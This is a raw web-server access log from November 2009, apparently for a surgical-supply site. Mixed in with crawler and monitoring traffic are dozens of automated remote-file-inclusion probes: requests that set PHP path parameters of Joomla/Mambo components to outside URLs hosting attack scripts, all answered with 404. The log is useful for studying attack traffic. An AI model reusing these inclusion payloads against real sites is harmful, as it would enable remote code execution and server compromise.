67.195.114.54 - - [26/Nov/2009:05:20:22 -0500] "GET /logs/error_log.Q109112400 HTTP/1.0" 200 1968304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [26/Nov/2009:05:20:52 -0500] "GET /logs/access_log.Q109082900//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:05:21:09 -0500] "GET /logs/access_log.Q109051500%20%20//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 381 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:10 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:10 -0500] "GET /logs/access_log.Q109050800%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:10 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:15 -0500] "GET /logs//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:15 -0500] "GET /logs/access_log.Q109051500%20%20//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:15 -0500] "GET //skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.125.66.79 - - [26/Nov/2009:05:21:27 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.7.108.203 - - [26/Nov/2009:05:21:30 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:30 -0500] "GET /logs/error_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:30 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:21:33 -0500] "GET /logs/error_log.Q109110100//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:21:39 -0500] "GET /logs/error_log.Q109100300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:05:21:39 -0500] "GET /logs/access_log.Q109093000%20%20//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 381 "-" "Mozilla/5.0"
114.108.177.238 - - [26/Nov/2009:05:21:41 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://design.rightside.ru//appserv/all.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.108.177.238 - - [26/Nov/2009:05:21:41 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://design.rightside.ru//appserv/all.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:41 -0500] "GET /logs//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:41 -0500] "GET //skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:41 -0500] "GET /logs/access_log.Q109051500%20%20//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.230.181.203 - - [26/Nov/2009:05:21:44 -0500] "GET /components/com_simpleboard/file_upload.php?sbp=http://open-saas.com//c.txt? HTTP/1.1" 404 240 "-" "Mozilla/3.0 (compatible; Indy Library)"
122.200.64.9 - - [26/Nov/2009:05:21:47 -0500] "GET /logs/access_log.Q109051500%20%20//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:47 -0500] "GET //skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:21:47 -0500] "GET /logs//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.108.177.238 - - [26/Nov/2009:05:21:52 -0500] "GET /logs/access_log.Q109091100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://design.rightside.ru//appserv/all.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
119.152.134.207 - - [26/Nov/2009:05:21:56 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
119.152.134.207 - - [26/Nov/2009:05:21:56 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
119.152.134.207 - - [26/Nov/2009:05:22:05 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
119.152.134.207 - - [26/Nov/2009:05:22:05 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
200.71.237.150 - - [26/Nov/2009:05:22:05 -0500] "GET /logs/access_log.Q109100200///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.813"
207.7.108.203 - - [26/Nov/2009:05:22:09 -0500] "GET /logs/error_log.Q109081700//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:22:10 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:22:10 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
157.82.156.230 - - [26/Nov/2009:05:21:38 -0500] "GET /logs/error_log.Q109100300 HTTP/1.1" 200 3446921 "http://getaforum.com/i.social.php?Q==/shop/news.php?id=/index.php?autoLoadConfig%5B999%5D%5B0%5D%5BautoType%5D=i&start=75" "Mozilla/5.0 (compatible; Steeler/3.5; http://www.tkl.iis.u-tokyo.ac.jp/~crawler/)"
122.200.64.9 - - [26/Nov/2009:05:22:15 -0500] "GET /logs/access_log.Q109092500//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:22:15 -0500] "GET /logs//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:22:15 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:22:15 -0500] "GET /logs/error_log.Q109061100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:22:15 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:22:19 -0500] "GET /logs//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:22:19 -0500] "GET /logs/access_log.Q109092500//skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.200.64.9 - - [26/Nov/2009:05:22:20 -0500] "GET //skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:05:22:22 -0500] "GET /logs/access_log.Q109093000%20%20//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 381 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:22:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.200.64.9 - - [26/Nov/2009:05:22:23 -0500] "GET //skin/myssun115_note_white/setup.php?dir=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:22:25 -0500] "GET /logs/error_log.Q109110700%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
220.181.7.122 - - [26/Nov/2009:05:22:27 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.111.169 - - [26/Nov/2009:05:22:28 -0500] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.111.169 - - [26/Nov/2009:05:22:29 -0500] "GET /logs/access_log.Q109082900 HTTP/1.0" 200 2500375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.200.255.18 - - [26/Nov/2009:05:22:49 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:22:49 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:22:49 -0500] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:22:50 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:22:50 -0500] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:22:51 -0500] "GET /logs/access_log.Q109090100//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:22:52 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:23:06 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:23:06 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:23:06 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:23:06 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:23:19 -0500] "GET /logs/error_log.Q109091500//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:23:34 -0500] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:23:34 -0500] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:23:49 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:23:49 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:23:49 -0500] "GET /logs/error_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:24:01 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:24:01 -0500] "GET /logs/access_log.Q109052400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:24:03 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:24:31 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:24:31 -0500] "GET /logs/error_log.Q109070400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:24:31 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:24:36 -0500] "GET /logs/error_log.Q109052900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:05:24:47 -0500] "GET /logs/error_log.Q109051900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:10 -0500] "GET /logs/error_log.Q109061600//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:17 -0500] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:18 -0500] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:18 -0500] "GET /logs/access_log.Q109091100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:20 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:20 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:20 -0500] "GET /logs/error_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:25:38 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:25:38 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:25:46 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.185.231.103 - - [26/Nov/2009:05:25:46 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:54 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:54 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:25:54 -0500] "GET /logs/error_log.Q109081300//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:26:39 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:26:39 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:26:39 -0500] "GET /logs/error_log.Q109110100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:26:49 -0500] "GET /logs/access_log.Q109072500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:27:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [26/Nov/2009:05:27:29 -0500] "GET /logs/error_log.Q109061100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:27:40 -0500] "GET /logs/error_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:28:06 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:28:06 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:28:06 -0500] "GET /logs/error_log.Q109081300//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:05:28:26 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.65.67 - - [26/Nov/2009:05:28:26 -0500] "GET /images/items/suture_pga_thumb.jpg HTTP/1.1" 200 2803 "-" "Googlebot-Image/1.0"
82.195.252.206 - - [26/Nov/2009:05:28:30 -0500] "GET /logs/access_log.Q109072800//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 379 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:05:28:35 -0500] "GET /logs/error_log.Q109062800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [26/Nov/2009:05:29:18 -0500] "GET /logs/access_log.Q109072500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:29:27 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:29:27 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:29:27 -0500] "GET /logs/access_log.Q109091100%20%20//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:29:51 -0500] "GET /logs/access_log.Q109051200%20%20//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:30:37 -0500] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:30:38 -0500] "GET /logs/error_log.Q109061800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:30:38 -0500] "GET /logs//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:30:38 -0500] "GET //include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:31:15 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:31:15 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:31:21 -0500] "GET /logs//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:31:21 -0500] "GET //include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:31:23 -0500] "GET /logs/access_log.Q109081600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.94.118.197 - - [26/Nov/2009:05:31:24 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:31:24 -0500] "GET /logs/error_log.Q109052900//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:05:31:33 -0500] "GET /logs/error_log.Q109081100 HTTP/1.0" 200 2933596 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Nov/2009:05:32:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.97.219.4 - - [26/Nov/2009:05:33:01 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:05:33:01 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
